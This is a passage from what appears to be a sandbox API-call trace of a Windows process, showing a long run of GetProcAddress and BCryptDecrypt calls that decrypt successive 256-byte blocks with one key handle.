pbIV=0x0, cbIV=0x0, pbOutput=0x20459f1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20459f1, pcbResult=0x14f8fc) returned 0x0 [0174.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.138] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045ae6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045ae6, pcbResult=0x14f8fc) returned 0x0 [0174.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.140] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045bdb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045bdb, pcbResult=0x14f8fc) returned 0x0 [0174.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.142] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045cd0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045cd0, pcbResult=0x14f8fc) returned 0x0 [0174.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.144] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045dc5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045dc5, pcbResult=0x14f8fc) returned 0x0 [0174.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.146] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045eba, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045eba, pcbResult=0x14f8fc) returned 0x0 [0174.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.148] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e81fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045faf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045faf, pcbResult=0x14f8fc) returned 0x0 [0174.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.151] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e820d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20460a4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20460a4, pcbResult=0x14f8fc) returned 0x0 [0174.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.153] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e821d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046199, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046199, pcbResult=0x14f8fc) returned 0x0 [0174.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.156] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e822d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204628e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204628e, pcbResult=0x14f8fc) returned 0x0 [0174.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.254] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e823d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046383, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046383, pcbResult=0x14f8fc) returned 0x0 [0174.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.256] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e824d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046478, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046478, pcbResult=0x14f8fc) returned 0x0 [0174.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.258] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e825d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204656d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204656d, pcbResult=0x14f8fc) returned 0x0 [0174.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.260] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e826d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046662, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046662, pcbResult=0x14f8fc) returned 0x0 [0174.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.262] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e827d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046757, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046757, pcbResult=0x14f8fc) returned 0x0 [0174.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.264] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e828d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204684c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204684c, pcbResult=0x14f8fc) returned 0x0 [0174.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.266] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e829d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046941, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046941, pcbResult=0x14f8fc) returned 0x0 [0174.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.269] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046a36, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046a36, pcbResult=0x14f8fc) returned 0x0 [0174.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.271] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046b2b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046b2b, pcbResult=0x14f8fc) returned 0x0 [0174.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.273] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046c20, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046c20, pcbResult=0x14f8fc) returned 0x0 [0174.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.275] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046d15, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046d15, pcbResult=0x14f8fc) returned 0x0 [0174.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.277] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046e0a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046e0a, pcbResult=0x14f8fc) returned 0x0 [0174.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.279] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e82fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046eff, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046eff, pcbResult=0x14f8fc) returned 0x0 [0174.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.281] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e830d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2046ff4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2046ff4, pcbResult=0x14f8fc) returned 0x0 [0174.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.283] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e831d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20470e9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20470e9, pcbResult=0x14f8fc) returned 0x0 [0174.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.453] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e832d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20471de, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20471de, pcbResult=0x14f8fc) returned 0x0 [0174.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.454] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e833d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20472d3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20472d3, pcbResult=0x14f8fc) returned 0x0 [0174.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.456] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e834d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20473c8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20473c8, pcbResult=0x14f8fc) returned 0x0 [0174.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.457] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e835d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20474bd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20474bd, pcbResult=0x14f8fc) returned 0x0 [0174.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.458] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e836d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20475b2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20475b2, pcbResult=0x14f8fc) returned 0x0 [0174.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.460] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e837d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20476a7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20476a7, pcbResult=0x14f8fc) returned 0x0 [0174.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.461] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e838d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204779c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204779c, pcbResult=0x14f8fc) returned 0x0 [0174.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.463] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e839d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047891, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047891, pcbResult=0x14f8fc) returned 0x0 [0174.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.464] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047986, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047986, pcbResult=0x14f8fc) returned 0x0 [0174.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.466] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047a7b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047a7b, pcbResult=0x14f8fc) returned 0x0 [0174.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.468] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047b70, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047b70, pcbResult=0x14f8fc) returned 0x0 [0174.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.469] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047c65, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047c65, pcbResult=0x14f8fc) returned 0x0 [0174.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.470] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047d5a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047d5a, pcbResult=0x14f8fc) returned 0x0 [0174.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.472] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e83fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047e4f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047e4f, pcbResult=0x14f8fc) returned 0x0 [0174.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.474] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e840d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2047f44, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2047f44, pcbResult=0x14f8fc) returned 0x0 [0174.477] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.477] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e841d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048039, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048039, pcbResult=0x14f8fc) returned 0x0 [0174.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.478] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e842d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204812e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204812e, pcbResult=0x14f8fc) returned 0x0 [0174.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.480] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e843d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048223, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048223, pcbResult=0x14f8fc) returned 0x0 [0174.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.482] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e844d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048318, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048318, pcbResult=0x14f8fc) returned 0x0 [0174.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.483] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e845d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204840d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204840d, pcbResult=0x14f8fc) returned 0x0 [0174.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.485] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e846d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048502, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048502, pcbResult=0x14f8fc) returned 0x0 [0174.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.486] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e847d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20485f7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20485f7, pcbResult=0x14f8fc) returned 0x0 [0174.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.488] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e848d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20486ec, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20486ec, pcbResult=0x14f8fc) returned 0x0 [0174.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.599] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e849d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20487e1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20487e1, pcbResult=0x14f8fc) returned 0x0 [0174.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.601] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20488d6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20488d6, pcbResult=0x14f8fc) returned 0x0 [0174.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.602] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20489cb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20489cb, pcbResult=0x14f8fc) returned 0x0 [0174.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.604] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048ac0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048ac0, pcbResult=0x14f8fc) returned 0x0 [0174.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.605] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048bb5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048bb5, pcbResult=0x14f8fc) returned 0x0 [0174.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.606] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048caa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048caa, pcbResult=0x14f8fc) returned 0x0 [0174.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.608] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e84fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048d9f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048d9f, pcbResult=0x14f8fc) returned 0x0 [0174.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.609] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e850d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048e94, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048e94, pcbResult=0x14f8fc) returned 0x0 [0174.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.611] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e851d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2048f89, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2048f89, pcbResult=0x14f8fc) returned 0x0 [0174.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.612] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e852d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204907e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204907e, pcbResult=0x14f8fc) returned 0x0 [0174.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.613] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e853d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049173, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049173, pcbResult=0x14f8fc) returned 0x0 [0174.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.615] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e854d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049268, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049268, pcbResult=0x14f8fc) returned 0x0 